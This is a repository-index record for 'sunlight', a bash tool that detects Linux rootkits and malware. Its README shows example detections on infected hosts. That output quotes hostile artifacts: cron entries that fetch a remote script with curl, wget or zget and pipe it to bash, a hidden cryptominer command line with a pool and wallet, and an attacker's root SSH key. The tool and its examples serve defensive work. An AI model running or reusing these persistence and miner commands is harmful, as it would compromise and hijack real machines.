{"id":19789166,"url":"https://github.com/tstromberg/sunlight","last_synced_at":"2025-05-01T00:32:01.691Z","repository":{"id":147896938,"uuid":"606045479","full_name":"tstromberg/sunlight","owner":"tstromberg","description":"Linux #rootkit and #malware revealer","archived":false,"fork":false,"pushed_at":"2024-08-01T14:01:38.000Z","size":472,"stargazers_count":13,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-08-01T15:44:22.016Z","etag":null,"topics":["linux","malware","rootkit","rootkit-hunter"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tstromberg.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-02-24T13:29:09.000Z","updated_at":"2024-03-13T20:17:39.000Z","dependencies_parsed_at":"2023-10-23T15:38:02.101Z","dependency_job_id":"a1c432e6-21c1-47e6-9e94-b75c8c109069","html_url":"https://github.com/tstromberg/sunlight","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tstromberg%2Fsunlight/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tstromberg","download_url":"https://codeload.github.com/tstromberg/sunlight/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224230491,"owners_count":17277349,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux","malware","rootkit","rootkit-hunter"],"created_at":"2024-11-12T06:30:10.106Z","updated_at":"2024-11-12T06:30:10.801Z","avatar_url":"https://github.com/tstromberg.png","language":"Shell","readme":"# sunlight\n\n[![Latest Release](https://img.shields.io/github/v/release/tstromberg/sunlight?include_prereleases)](https://github.com/tstromberg/sunlight/releases/latest)\n[![stable](https://badges.github.io/stability-badges/dist/stable.svg)](https://github.com/badges/stability-badges)\n\nsunlight is a tool to reveal Linux rootkits (including eBPF) and other malware. It's written in bash, so it's easy to understand or take apart.\n\n![example](images/logo.png?raw=true \"logo\")\n\n## Requirements\n\nThe following are required:\n\n* Linux (some checks work on other UNIX platforms)\n* bash\n\nThe following tools are optional but highly recommended:\n\n* `osqueryi` - for comprehensive process analysis\n* `bpftool`, `jq` - for eBPF analysis\n\n## Usage\n\nTo run all of the scripts:\n\n```shell\nsudo ./sunlight.sh\n```\n\nTo run a single script:\n\n```shell\n./mystery-char-device.sh\n```\n\n## Example output (Qubitstrike)\n\nOn a host infected with Qubitstrike (which in turn installs Diamorphine), sunlight shows the following output:\n\n```log\n-- [ hidden-files.sh ] ---------------------------------------------------------\n   793453      4 drwxr-xr-x   2 root     root         4096 Oct 20 02:06 /usr/share/.28810\n   762662      4 drwxr-xr-x   2 root     root         4096 Oct 23 15:23 /usr/share/.LQvKibDTq4\n\n-- [ hidden-pids.sh ] ----------------------------------------------------------\n- hidden python-dev[22076] is running /usr/share/.LQvKibDTq4/python-dev: /usr/share/.LQvKibDTq4/python-dev -B -o pool.hashvault.pro:80 -u 49qQh9VMzdJTP1XA2yPDSx1QbYkDFupydE5AJAA3jQKTh3xUYVyutg28k2PtZGx8z3P2SS7VWKMQUb9Q4WjZ3jdmHPjoJRo -p 136.54.68.146 --donate-level 1 --tls --tls-fingerprint=420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 --max-cpu-usage 90 \n\n-- [ kernel-taint.sh ] ---------------------------------------------------------\nkernel taint value: 12288\n* matches bit 12: externally-built (out-of-tree) module was loaded\n* matches bit 13: unsigned module was loaded\n\ndmesg:\n[ 1429.084807] diamorphine: loading out-of-tree module taints kernel.\n[ 1429.086163] diamorphine: module verification failed: signature and/or required key missing - tainting kernel\n\n-- [ root-ssh-authorized-keys.sh ] ---------------------------------------------\nroot ssh keys found:\n--------------------\n  File: /root/.ssh/authorized_keys\n  Size: 563        Blocks: 8          IO Block: 4096   regular file\nDevice: 252,1 Inode: 74748       Links: 1\nAccess: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2023-10-23 15:16:53.720318244 +0000\nModify: 2023-10-23 14:50:47.836000000 +0000\nChange: 2023-10-23 15:16:53.708318146 +0000\n Birth: 2023-10-18 18:19:24.854873239 +0000\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDV+S/3d5qwXg1yvfOm3ZTHqyE2F0zfQv1g12Wb7H4N5EnP1m8WvBOQKJ2htWqcDg2dpweE7htcRsHDxlkv2u+MC0g1b8Z/HawzqY2Z5FH4LtnlYq1QZcYbYIPzWCxifNbHPQGexpT0v/e6z27NiJa6XfE0DMpuX7lY9CVUrBWylcINYnbGhgSDtHnvSspSi4Qu7YuTnee3piyIZhN9m+tDgtz+zgHNVx1j0QpiHibhvfrZQB+tgXWTHqUazwYKR9td68twJ/K1bSY+XoI5F0hzEPTJWoCl3L+CKqA7gC3F9eDs5Kb11RgvGqieSEiWb2z2UHtW9KnTKTRNMdUNA619/5/HAsAcsxynJKYO7V/ifZ+ONFUMtm5oy1UH+49ha//UPWUA6T6vaeApzyAZKuMEmFGcNR3GZ6e8rDL0/miNTk6eq3JiQFR/hbHpn8h5Zq9NOtCoUU7lOvTGAzXBlfD5LIlzBnMA3EpigTvLeuHWQTqNPEhjYNy/YoPTgBAaUJE= root@kali\nfailed with 1\n\n-- [ rootkit-signal-handler.sh ] -----------------------------------------------\nNOTE: root-escalation detection requires a non-root user\n- SIGNAL 31 made /proc/51645 (this process) invisible!\n- SIGNAL 63 caused /proc/modules to change:\n--- /tmp/tmp.Kl6Zm2Jk8l 2023-10-23 15:45:26.596006729 +0000\n+++ /tmp/tmp.XCSOBYg4Gu 2023-10-23 15:45:26.780007070 +0000\n@@ -10,6 +10,7 @@\n bridge\n btrfs\n ccp\n+diamorphine\n dm_multipath\n drm\n drm_kms_helper\n- SIGNAL 31 made /proc/51645 (this process) visible again!\n- SIGNAL 63 caused /proc/modules to change:\n--- /tmp/tmp.A6hTPpB1Vh 2023-10-23 15:45:53.924059225 +0000\n+++ /tmp/tmp.9PeU5G9c6v 2023-10-23 15:45:54.104059583 +0000\n@@ -10,7 +10,6 @@\n bridge\n btrfs\n ccp\n-diamorphine\n dm_multipath\n drm\n drm_kms_helper\n\n-- [ suspicious-cron.sh ] ------------------------------------------------------\nno crontab for root\n/etc/cron.d/netns:*/1 * * * * root /usr/share/.28810/kthreadd\n/etc/cron.d/apache2.2:@daily root zget -q -O - https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash\n/etc/cron.d/apache2:@reboot root /usr/share/.LQvKibDTq4/python-dev -c /usr/share/.LQvKibDTq4/config.json\n/etc/cron.d/netns2:0 0 */2 * * * root curl https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash\n/etc/crontab:0 * * * * wget -O- https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash \u003e /dev/null 2\u003e\u00261\n/etc/crontab:0 0 */3 * * * zget -q -O - https://codeberg.org/m4rt1/sh/raw/branch/main/mi.sh | bash \u003e /dev/null 2\u003e\u00261\nfailed with 1\n```\n\n## Example output (reveng_rtkit)\n\n```log\n-- [ kernel-taint.sh ] ---------------------------------------------------------\nkernel taint value: 12288\n* matches bit 12: externally-built (out-of-tree) module was loaded\n* matches bit 13: unsigned module was loaded\n\ndmesg:\n[  368.765518] reveng_rtkit: loading out-of-tree module taints kernel.\n[  368.777600] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel\n\n-- [ mystery-char-devices.sh ] -------------------------------------------------\nlow dynamic major device etx_device[247]\n* crw------- 1 root root 247, 0 Mar  3 19:48 /dev/etx_device\n* /proc/devices: 247 etx_Dev\n```\n\n## Example output (TripleCross, an eBPF rootkit)\n\n```log\n-- [ unexpected-ebpf-hooks.sh ] ------------------------------------------------\n* Found interface with network traffic-control filtering enabled (tc qdisc):\nqdisc clsact ffff: dev eth0 parent ffff:fff1 \n\n* Found unexpected eBPF filesystem entry:\n/sys/fs/bpf/backdoor_phantom_shell\n\n* Unexpected eBPF map found:\n{\n  \"id\": 9,\n  \"type\": \"hash\",\n  \"name\": \"backdoor_phanto\",\n  \"flags\": 0,\n  \"bytes_key\": 8,\n  \"bytes_value\": 76,\n  \"max_entries\": 1,\n  \"bytes_memlock\": 4096,\n  \"frozen\": 0,\n  \"btf_id\": 92\n}\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftstromberg%2Fsunlight","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftstromberg%2Fsunlight","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftstromberg%2Fsunlight/lists"}